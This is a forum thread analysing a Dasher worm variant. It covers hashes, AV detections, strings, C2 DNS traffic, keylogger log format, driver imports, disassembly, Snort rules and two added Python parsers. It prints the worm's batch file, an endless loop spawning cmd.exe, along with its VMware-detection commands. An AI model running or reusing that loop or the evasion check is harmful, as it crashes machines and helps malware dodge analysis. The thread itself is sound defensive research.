
New A/V Unknown Dasher variant

UPDATE: F-Secure now detects this worm:

C:\virus\dasher\new\lol.exe Infection: Net-Worm.Win32.Dasher.c

Good job F-Secure guys!

NOTE: This worm specifically detects and attacks vmware systems to avoid analysis. More in the comments.

So thanks to tebodell we have a probable new variant of Dasher. Many of the antivirus tools don't find anything and this was a real pain to analyze. Basically it crashed my packer detectors, IDA found nothing, PE Explorer couldn't open it at all and neither could objdump. It crashed my VMware by opening 10000000 cmd.exe windows. I submitted it to a couple of the A/V vendors in case they don't already have it.

Once I was able to dump it from memory I was able to find:
0000356B 0040356B 0 SqlExp3.exe
00003577 00403577 0 SqlExp2.exe
00003583 00403583 0 SqlExp1.exe
0000358F 0040358F 0 SqlExp.exe
0000359A 0040359A 0 SqlScan.exe
000035A6 004035A6 0 Sqltob.exe

in the strings, which adds credence to the theory that this is a Dasher variant. The fact that it basically DoSes a VMware is interesting.

Scanning -> C:\malware\dasher2\lol.exe
File Type : Exe, Size : 70860 (0114CCh) Bytes
[!] File appears to have no protection or is using an unknown protection
- Scan Took : 0.953 Seconds

Packers detected:
PE_PATCH, UPACK

207.68.183.32

Different stages of debugging:

This is the original binary.

md5sum: ee8dbce857adf03838d882086c31b367 *lol.exe
sha1sum: b6adc65b1e0a45909d062e1e09357f9eb4be2cc8
sha256sum: 8fb8c1f037a2f52519d417e7aa596d6e81fa8c58928bebcb97adf7742e60d389
info: 70860 Dec 24 10:27 lol.exe
lol.exe: MS-DOS executable (EXE)

This is the binary in OllyDbg at the start and various stages:
75c372951393f398495c3e62053e55b9 *dumped.exe
75c372951393f398495c3e62053e55b9 *dumped2.exe
75c372951393f398495c3e62053e55b9 *dumped3.exe

This is the binary in OllyDbg right before it executes N cmd.exe windows.
md5sum: 5cfeee4714b69aed84380343bffc7abe *dumped4.exe
sha1sum: bf8069c233765ca6e823887c5cec6f36954520d9
sha256sum: 20aebba227e048708dedb527bdbeb002b506fc7f4873da0bb5075167cae8fd6f
info: dumped4.exe: MS-DOS executable (EXE)
192512 Dec 24 10:20 dumped4.exe

objdump cannot recognize the file.

My Symantec antivirus finds nothing. Various antivirus scans find almost nothing:

The original lol.exe file:
=========================================
AntiVir Found nothing
ArcaVir Found Win32
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found Exploit.SQL.Hello.B
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found Net-Worm.Win32.Dasher.c
NOD32 Found probably a variant of Win32/Dasher (probable variant)
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing

The dumped4.exe file:
==========================================
AntiVir Found Worm/Dasher.B.TScan
ArcaVir Found nothing
Avast Found Win32:Dasher-B
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found Worm.Dasher.B-3
Dr.Web Found BackDoor.Winshe
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found probably a variant of Win32/Dasher (probable variant)
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing

interesting strings

There are a lot of strings that match the previous Dasher variant, and some new interesting ones.

Maybe it shuts down firewalls?

000034BC 004034BC 0 Blackice.exe
000034C9 004034C9 0 Blackd.exe
000034D4 004034D4 0 EGhost.exe
000034DF 004034DF 0 adam.exe
000034E8 004034E8 0 system.exe
000034F3 004034F3 0 Iparmor.exe
000034FF 004034FF 0 Zonealarm.exe

Maybe they should be better about strings :)
00004E2C 00404E2C 0 Sqltob Final!!! by rainer

I guess this is how it knows it's in VMware. This could make analysis suck :(

000177B2 004177B2 0 net start | findstr Virtual && echo VirtualPC>%s
000177E5 004177E5 0 net start | findstr VMware && echo VMware>%s
00017816 00417816 0 %s\Virtual.bat
00017825 00417825 0 %s\VirtualPC.txt
00017836 00417836 0 %s\VMware.txt

confirmed

I've confirmed those files as well. The plot thickens, however. These files have also been obfuscated to make analysis harder. They crash my packer ID tools as well, even Protection ID, which doesn't usually crash.

I dumped the eiafasrk.dl1 and eiafasrk.dll from memory and in the .dll I find the following URL:

rain357.3322.org

Which is in China but appears to be down.
Here are the checksums for the dumped DLLs. I suspect these might change on different systems:

C:\malware\dasher2\dumped_eia_fasrk_dl1.dll
md5sum: afb852d0992c4c0a484d329d74ccdd97
sha1sum: 7c884bd6eb6b7c05eb5193342b4b1b7350225db2
sha256sum: 68135e51023853c69852ac699874b8f37df8d4f839a443319dcdea85c1032680

C:\malware\dasher2\dumped_eia_fasrk_dll.dll
md5sum: 56d22f66bf61f163061ec2a143057d68
sha1sum: db0663720c77831e0935c7773d09acdbd200bb3a
sha256sum: a855caf30a9668581f9814f144bd30b9a1846d8ead861a4851d1dab7a16244e7

More as I get it.

V.

network specifics

First it sends two DNS packets to query for the URL rain357.3322.org

0000 00 06 25 62 de 56 00 0c 29 7e 41 d5 08 00 45 00 ..%b.V..)~A...E.
0010 00 3e 12 dd 00 00 80 11 b8 b5 c0 a8 01 66 ac 10 .>...........f..
0020 00 fe 04 03 00 35 00 2a 3a fe 04 23 01 00 00 01 .....5.*:..#....
0030 00 00 00 00 00 00 07 72 61 69 6e 33 35 37 04 33 .......rain357.3
0040 33 32 32 03 6f 72 67 00 00 01 00 01 322.org.....

Then we get a response. The site is down:

0000 00 0c 29 7e 41 d5 00 06 25 62 de 56 08 00 45 00 ..)~A... %b.V..E.
0010 00 9a 04 e8 00 00 40 11 06 4f ac 10 00 fe c0 a8 ......@. .O......
0020 01 66 00 35 04 26 00 86 50 0f 04 24 81 80 00 01 .f.5.&.. P..$....
0030 00 01 00 02 00 02 07 72 61 69 6e 33 35 37 04 33 .......r ain357.3
0040 33 32 32 03 6f 72 67 00 00 01 00 01 c0 0c 00 01 322.org. ........
0050 00 01 00 00 00 05 00 04 c0 a8 00 ff c0 14 00 02 ........ ........
0060 00 01 00 00 0e e7 00 0e 03 6e 73 32 04 33 33 32 ........ .ns2.332
0070 32 03 6e 65 74 00 c0 14 00 02 00 01 00 00 0e e7 2.net... ........
0080 00 06 03 6e 73 31 c0 42 c0 58 00 01 00 01 00 01 ...ns1.B .X......
0090 2e ef 00 04 3d b1 5f 7d c0 3e 00 01 00 01 00 01 ....=._} .>......
00a0 2e ef 00 04 de b9 f5 fe ........

I believe that if the site was up and the DNS query was successful, keylog data would be sent.

Here is the APNIC info for this address:

inetnum: 61.177.0.0 - 61.177.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
mnt-routes: maint-chinanet-js
changed: hostmaster@ns.chinanet.cn.net 20020209
changed: hostmaster@ns.chinanet.cn.net 20030306
status: ALLOCATED non-PORTABLE
source: APNIC

route: 61.177.0.0/16
descr: CHINANET jiangsu province network
country: CN
origin: AS23650
mnt-by: MAINT-CHINANET-JS
changed: ip@jsinfo.net 20030414
source: APNIC

role: CHINANET JIANGSU
address: No.268,Hanzhong Road,Nanjing 210029
country: CN
phone: +86-25-6588783
fax-no: +86-25-6588740
e-mail: ip@jsinfo.net
trouble: send anti-spam reports to spam@jsinfo.net
trouble: send abuse reports to abuse@jsinfo.net
trouble: times in GMT+8
admin-c: CH360-AP
tech-c: CS306-AP
tech-c: CN142-AP
nic-hdl: CJ186-AP
remarks: www.jsinfo.net
notify: ip@jsinfo.net
mnt-by: MAINT-CHINANET-JS
changed: dns@ptt.js.cn 20020530
changed: ip@jsinfo.net 20021213
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: lqing@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC

V.
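The DNS reply above, decoded: an added example that is not part of the original post. The hexdump is re-typed into the block as a constant, the parser follows RFC 1035 name-compression pointers, and the last function flags when the queried name resolves into private or loopback space, as it does here (192.168.0.255) and in the 127.0.0.1 answer reported further down; function names are my own.

```python
import ipaddress
import struct

RESPONSE_HEX = (  # the thread's reply hexdump (whole Ethernet frame), re-typed as hex
    "000c297e41d500062562de5608004500009a04e800004011064fac1000fec0a8"
    "0166003504260086500f042481800001000100020002077261696e3335370433"
    "333232036f72670000010001c00c00010001000000050004c0a800ffc0140002"
    "000100000ee7000e036e73320433333232036e657400c0140002000100000ee7"
    "0006036e7331c042c0580001000100012eef00043db15f7dc03e000100010001"
    "2eef0004deb9f5fe"
)

def read_name(msg, off):
    """Decode the name at off, following RFC 1035 pointers; return (name, end)."""
    labels, end = [], None             # end: offset just past the name as written at off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:      # 2-byte compression pointer into the message
            end = end if end is not None else off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            return ".".join(labels), (end if end is not None else off)
        labels.append(msg[off:off + length].decode("ascii"))
        off += length

def parse_dns(payload):
    """Return (question name, [(owner, rtype, rdata), ...]) over every RR."""
    _qd, an, ns, ar = struct.unpack("!4H", payload[4:12])
    qname, off = read_name(payload, 12)
    off += 4                           # skip QTYPE and QCLASS
    records = []
    for _ in range(an + ns + ar):
        owner, off = read_name(payload, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        off += 10
        rdata = payload[off:off + rdlen]            # raw bytes for other types
        if rtype == 1:                 # A: 4-byte IPv4 address
            rdata = str(ipaddress.IPv4Address(rdata))
        elif rtype == 2:               # NS: possibly compressed name
            rdata = read_name(payload, off)[0]
        off += rdlen
        records.append((owner, rtype, rdata))
    return qname, records

def c2_answers(frame_hex=RESPONSE_HEX):
    # A records for the queried name, flagged True when private or loopback.
    qname, records = parse_dns(bytes.fromhex(frame_hex)[42:])  # skip Eth+IPv4+UDP headers
    return [(ip, ipaddress.ip_address(ip).is_private)
            for owner, rtype, ip in records if rtype == 1 and owner == qname]
```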

spoofing DNS

So spoofing DNS yielded some strange results.

IEXPLORE.EXE makes sequential TCP SYN connections to the host it thinks is rain357.3322.org from source port 5262.

Mine start at 1433 (SQL?) and just kept going port by port. Maybe it's looking for a HTTP server on a non-standard port for the backdoor stuff to work?

No keylogger data that I could see was sent but it probably wouldn't try until it establishes a good connection.

I did a lookup on

I did a lookup on rain357.3322.org , and oddly enough the auth. nameserver told me that it's 192.168.0.255 :)

Retrieving DNS records for rain357.3322.org...

DNS servers
ns1.3322.net
ns2.3322.net [222.185.245.254]

Answer records
rain357.3322.org 1 A 192.168.0.255 60s

Authority records
3322.org 1 NS ns1.3322.net 86400s
3322.org 1 NS ns2.3322.net 86400s

Additional records
ns1.3322.net 1 A 61.177.95.125 151314s
ns2.3322.net 1 A 222.185.245.254 150651s

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

and now

LOL, I get 127.0.0.1 (localhost!) from my ISP's nameservers.

Ned

It is not only a keylogger,

It is not only a keylogger, it is also a trojan.
3322.org is a dynamic secondary domain name provider, so rain357.3322.org is actually the attacker's box, and the DNS record can be changed at will by the attacker.

The batch file

The worm creates a batch file to run if VMware is detected. The location is c:\documents and settings\username\Local Settings\Temp and the file name is fuckoff.bat. Here is the source:

@echo off
:try
copy "C:\WINDOWS\System32\cmd.exe" "C:\malware\lol.exe" /y
START "C:\WINDOWS\System32\cmd.exe"
goto try

vmware attack code

So this worm detects if it is running in VMware and attacks the system with a denial of service if so. The attack is basically to open cmd.exe windows until the system dies. The method it uses to detect VMware is somewhat lame. Basically it parses "net start" command output looking for VMware related services. I am going to try to patch the binary to jump over this check so I can run it in VMware anyway.

Here is some related disassembly:

PS______:00401CD0 ; Attributes: bp-based frame
PS______:00401CD0
PS______:00401CD0 sub_401CD0 proc near ; CODE XREF: sub_40123C+3p
PS______:00401CD0
PS______:00401CD0 var_400 = dword ptr -400h
PS______:00401CD0 var_300 = dword ptr -300h
PS______:00401CD0 var_200 = dword ptr -200h
PS______:00401CD0 var_100 = dword ptr -100h
PS______:00401CD0
PS______:00401CD0 push ebp
PS______:00401CD1 mov ebp, esp
PS______:00401CD3 sub esp, 400h
PS______:00401CD9 push edi
PS______:00401CDA lea eax, [ebp+var_100]
PS______:00401CE0 push eax
PS______:00401CE1 push 100h
PS______:00401CE6 call sub_401FBC
PS______:00401CEB lea eax, [ebp+var_100]
PS______:00401CF1 push eax
PS______:00401CF2 push offset aSVmware_txt ; "%s\\VMware.txt"
PS______:00401CF7 lea eax, [ebp+var_200]
PS______:00401CFD push eax
PS______:00401CFE call sub_402178
PS______:00401D03 lea eax, [ebp+var_100]
PS______:00401D09 push eax
PS______:00401D0A push offset aSVirtualpc_txt ; "%s\\VirtualPC.txt"
PS______:00401D0F lea eax, [ebp+var_300]
PS______:00401D15 push eax
PS______:00401D16 call sub_402178
PS______:00401D1B lea eax, [ebp+var_100]
PS______:00401D21 push eax
PS______:00401D22 push offset aSVirtual_bat ; "%s\\Virtual.bat"
PS______:00401D27 lea eax, [ebp+var_400]
PS______:00401D2D push eax
PS______:00401D2E call sub_402178
PS______:00401D33 push offset aW ; "w"
PS______:00401D38 lea eax, [ebp+var_400]
PS______:00401D3E push eax
PS______:00401D3F call sub_40213C
PS______:00401D44 mov edi, eax
PS______:00401D46 lea eax, [ebp+var_200]
PS______:00401D4C push eax
PS______:00401D4D push offset aNetStartFindst ; "net start | findstr VMware && echo VMwa"...
PS______:00401D52 push edi
PS______:00401D53 call sub_402148
PS______:00401D58 lea eax, [ebp+var_300]
PS______:00401D5E push eax
PS______:00401D5F push offset aNetStartFind_0 ; "net start | findstr Virtual && echo Vir"...
PS______:00401D64 push edi
PS______:00401D65 call sub_402148
PS______:00401D6A push offset aDel0 ; "del %%0\r\n"
PS______:00401D6F push edi
PS______:00401D70 call sub_402148
PS______:00401D75 push edi
PS______:00401D76 call sub_402130
PS______:00401D7B push 0
PS______:00401D7D lea eax, [ebp+var_200]
PS______:00401D83 push eax
PS______:00401D84 call sub_401A9A
PS______:00401D89 add esp, 58h
PS______:00401D8C or eax, eax
PS______:00401D8E jz short loc_401D9D
PS______:00401D90 lea eax, [ebp+var_200]
PS______:00401D96 push eax
PS______:00401D97 call sub_40210C
PS______:00401D9C pop ecx

It crashed my vmware by

It crashed my VMware by opening 10000000 cmd.exe windows.

Why not remove / rename cmd.exe from your VMware image? It should not need it to operate, and if it's hard-coded to spawn using cmd.exe.....

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

keylogger

So every character that is typed gets sent to c:\Program Files\eiafasrk.log and after X characters IEXPLORE.EXE queries eiafasrk.dl1 and then C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat.

I will have some information about the file format of eiafasrk.log soon. Unfortunately, since the attacker's site is down I don't have data showing the keylog files getting sent, but I will probably try spoofing the DNS and see if I can trick it to send.

================================

OK, using the Helix Knoppix distro I was able to copy off the keylogger file. Booting a VMware VM to an ISO of a Knoppix CD is awesome, btw. The format of the file is:

[Date Time] Program Name - [filename] path
double echoed keystrokes

EX.

[2005-12-24 21:38:25] TextPad - [Document1 *] C:\Program Files\TextPad 4\TextPad.exe

tthhiiss iiss oonnllyy aa tteesstt

V.
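A parser for the eiafasrk.log layout described above, as an added example that is not part of the original post: the first sample entry is the one shown in the thread, the second is a constructed entry in the same format, and the undoubling rule (merge identical adjacent character pairs) is my inference from the sample, where spaces appear once. Names and the `Entry` structure are my own.

```python
import re
from dataclasses import dataclass, field

# Sample log content: first entry from the thread, second one constructed.
SAMPLE_LOG = """\
[2005-12-24 21:38:25] TextPad - [Document1 *] C:\\Program Files\\TextPad 4\\TextPad.exe

tthhiiss iiss oonnllyy aa tteesstt
[2005-12-24 21:40:02] Notepad - [Untitled - Notepad] C:\\WINDOWS\\system32\\notepad.exe

hheelllloo wwoorrlldd
"""
# [Date Time] Program Name - [window title] path
HEADER = re.compile(r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] (.+?) - \[(.*)\] (.+)$")

@dataclass
class Entry:
    timestamp: str
    program: str
    window: str
    path: str
    raw: list = field(default_factory=list)   # keystroke lines exactly as logged

def undouble(text):
    """Collapse the logger's doubled keystrokes ("tteesstt" -> "test").
    Only identical adjacent pairs are merged, so single spaces survive and an
    odd run of a repeated character is left as typed (assumption from the sample)."""
    out, i = [], 0
    while i < len(text):
        out.append(text[i])
        i += 2 if i + 1 < len(text) and text[i + 1] == text[i] else 1
    return "".join(out)

def parse_keylog(text):
    """Split the log into entries: one per window-focus header line."""
    entries = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            entries.append(Entry(*m.groups()))
        elif entries and line.strip():
            entries[-1].raw.append(line)
    return entries

def recovered_keystrokes(text=SAMPLE_LOG):
    """(timestamp, program, window title, decoded keystrokes) per entry."""
    return [(e.timestamp, e.program, e.window, undouble(" ".join(e.raw)))
            for e in parse_keylog(text)]
```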

eiafasrk.sys

This is a PE file and here are the identified functions and some strings:
6a18470b7982b4d3c91b0e2386de64bc *eiafasrk.sys

KfReleaseSpinLock 00010300
KfAcquireSpinLock 00010304
RtlFreeAnsiString 0001030C
RtlUnicodeStringToAnsiString 00010310
ObQueryNameString 00010314
ExAllocatePoolWithTag 00010318
RtlFreeUnicodeString 0001031C
wcscpy 00010320
RtlAnsiStringToUnicodeString 00010324
RtlInitAnsiString 00010328
ZwClose 0001032C
ZwSetValueKey 00010330
RtlInitUnicodeString 00010334
ZwOpenKey 00010338
wcslen 0001033C
wcscat 00010340
strchr 00010344
wcsncmp 00010348
ZwEnumerateKey 0001034C
ExFreePoolWithTag 00010350
wcscmp 00010354
RtlCompareMemory 00010358
RtlUpperString 0001035C
__imp_PsGetCurrentProcessId 00010360
ZwQueryDirectoryFile 00010364
ZwQueryValueKey 00010368
ZwEnumerateValueKey 0001036C
ZwDeviceIoControlFile 00010370
ZwQuerySystemInformation 00010374
IoDeleteDevice 00010378
IoDeleteSymbolicLink 0001037C
IofCompleteRequest 00010380
KeServiceDescriptorTable 00010384
IoCreateSymbolicLink 00010388
IoCreateDevice 0001038C
_wcsupr 00010390
ObfDereferenceObject 00010394
_strupr 00010398
ObReferenceObjectByHandle 0001039C
aRegistryMachin 00010608
aRegistryMach_0 00010678
aRegistryMach_1 000106E0
aRegistryMach_8 00010936
aRegistryMach_9 000109A6
aRegistryMac_10 00010A0E
aRegistryMach_2 00010FE4
aRegistryMach_3 00011018
aRegistryMach_4 00011050
aRegistryMach_5 00011080
aRegistryMach_6 000110B4
aRegistryMach_7 000110E4
aDosdevices 00011970
aDevice 00011C0A
aDosdevices_0 00011C1E
aLegacy_ 00011C3A
PsGetCurrentProcessId 00011DC8
start 00011DCE P
Source2 00012C10

STRINGS

seg001:00010FE4 00000034 C \\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\SERVICES
seg001:00011018 00000035 C \\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\ENUM\\ROOT
seg001:00011050 00000030 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\SERVICES
seg001:00011080 00000031 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\ENUM\\ROOT
seg001:000110B4 00000030 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET002\\SERVICES
seg001:000110E4 00000031 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET002\\ENUM\\ROOT

C'est la oInk

*** NOTE ***
Use these at your own risk.
If you update/change them please increment the rev number.
These are being written by a person who is just starting out, so advice, suggestions and critique are welcome. Flames will be sent to /dev/null.
-----------------------

alert tcp $HOME_NET any -> $EXTERNAL_NET 6667 (msg:"[OffensiveComputing] Dasher variant phoning home to IRC server"; content:"rain357"; nocase; sid:66600001; rev:1;)

alert tcp $HOME_NET 5262 -> $EXTERNAL_NET any (msg:"[OffensiveComputing] Dasher variant SYN scanning home"; flags:S; sid:66600002; rev:1;)

Question : Should we make VARs for known services with multiple ports , such as $IRC_PORTS & $SSL_PORTS ..etc..etc...

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior